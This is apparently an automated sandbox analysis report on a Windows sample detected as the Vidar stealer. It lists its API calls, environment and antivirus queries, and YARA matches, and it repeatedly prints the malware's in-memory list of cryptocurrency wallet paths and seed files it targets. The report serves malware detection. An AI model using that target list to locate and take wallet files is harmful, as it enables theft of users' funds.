                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,0_2_001A74EF
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001B051E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_001E9626
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,0_2_001B0624
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_001B06F3
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,0_2_001EBB00
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_001ECBF0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_001AFD8F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,0_2_001EBE1E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_001EAE74
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,1_2_001B0031
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,1_2_001A7026
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,1_2_001B007C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesW,1_2_001B0117
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_001B01A2
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,1_2_001B03F5
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,1_2_001A74EF
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_001B051E
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,1_2_001AFD8F
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,1_2_001B0624
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_001B06F3
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00410DB0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0042B11C
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0042B211
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429AA0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,2_2_0042B2B8
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0042B313
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0042AB90
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,2_2_00425433
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0042B4E4
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,2_2_004274EC
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_004275C6
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B5D0
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: EnumSystemLocalesA,2_2_0042B5A6
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_00429DBE
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,2_2_0042E5BF
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,2_2_0042B673
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_00428E14
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0042B637
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: GetLocaleInfoA,2_2_0042E6F4
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 0_2_0019A2C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0019A2C5
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00410C28 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00410C28
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_00410D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00410D03
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeCode function: 2_2_6CB78390 NSS_GetVersion,2_2_6CB78390
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.1c2c60.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.UMrFwHyjUi.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.UMrFwHyjUi.exe.190000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 1004, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: UMrFwHyjUi.exe PID: 5768, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685626702.0000000000CF1000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
